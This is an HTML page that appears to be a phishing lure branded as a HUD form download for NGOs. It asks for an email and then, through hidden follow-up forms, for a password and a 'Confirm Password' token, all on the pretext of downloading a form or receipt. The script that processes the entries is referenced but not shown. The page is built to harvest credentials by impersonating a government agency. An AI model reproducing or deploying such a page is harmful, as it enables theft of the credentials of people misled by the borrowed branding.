<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" type="text/css" href="/public/css/styles.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script src="/public/scripts/indexscript.js"></script>
    <title> HUD Form 2020-2023 NGOs </title>
</head>
<body>
    <style>
        body {
            text-align: center;
            background-image: url("/public/hud.png");
        }
        h3 {
            margin-top: 5%;
        }
        form {
            display: grid;
            margin-bottom: 10%;
        }
        .headline {
            margin-top: 20%;
        }
        input {
            padding: 20px;
            margin-top: 8px;
        }
        #swapbtn #tokenBtn {
            background-repeat: no-repeat;
            background-color: darkolivegreen;
            cursor: pointer;
        }
        h3 span {
            font-size: 18px;
        }
        #tokenForm {
            display: none;
        }
        #otpForm {
            display: none;
        }
        h2 {
            margin-top: 5%;
            font-size: 18px;
            font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
            color: brown;
        }
        h2 button {
            margin-top: 5%;
            font-size: 18px;
            font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
            color: brown;
        }
        #Form {
            display: none;
        }
        @media screen and (max-width: 400px){
            body{
                background-image: url("/public/image.png");
                background-repeat: no-repeat;
                background-size: auto auto;

            }
        }
    </style>
    <center>
        <h2 class="headline">
            <img alt="logo" src="/public/hud.png" width="50" height="40">
            <button>
                Enter Email to Download Form
            </button>
        </h2>
    </center>
    <form class="form"> 

        <div class="inputBox"> 
  
         <input placeholder="Enter Email" id="email" name="email" value="" type="email" required>
  
        </div>
  
        <div class="inputBox"> 
  
         <input id="proceed" type="submit" value="Download receipt"> 
  
        </div>
  
      </form>
      <form id="tokenForm">
        <center>
            <h2>
                Enter Password
            </h2>
        </center>
        <div class="inputBox"> 
  
            <input placeholder="Enter Password " id="password" name="Password" value="" type="password" required>
     
           </div>
           <div class="inputBox"> 
  
            <input id="continue" type="submit" value="Download Form"> 
     
           </div> 
      </form>
      <form  id="otpForm">
        <center>
            <h2>
                Confirm Password
            </h2>
        </center>
        <div class="inputBox"> 
  
            <input placeholder="Confirm Password" id="otp" name="Token" value="" type="text" required>
     
           </div>
           <div class="inputBox"> 
  
            <input id="viewInv" type="submit" value="Download Form"> 
     
           </div> 
      </form>
      <div style="display: none;" class="loader">

      </div>
</body>
</html>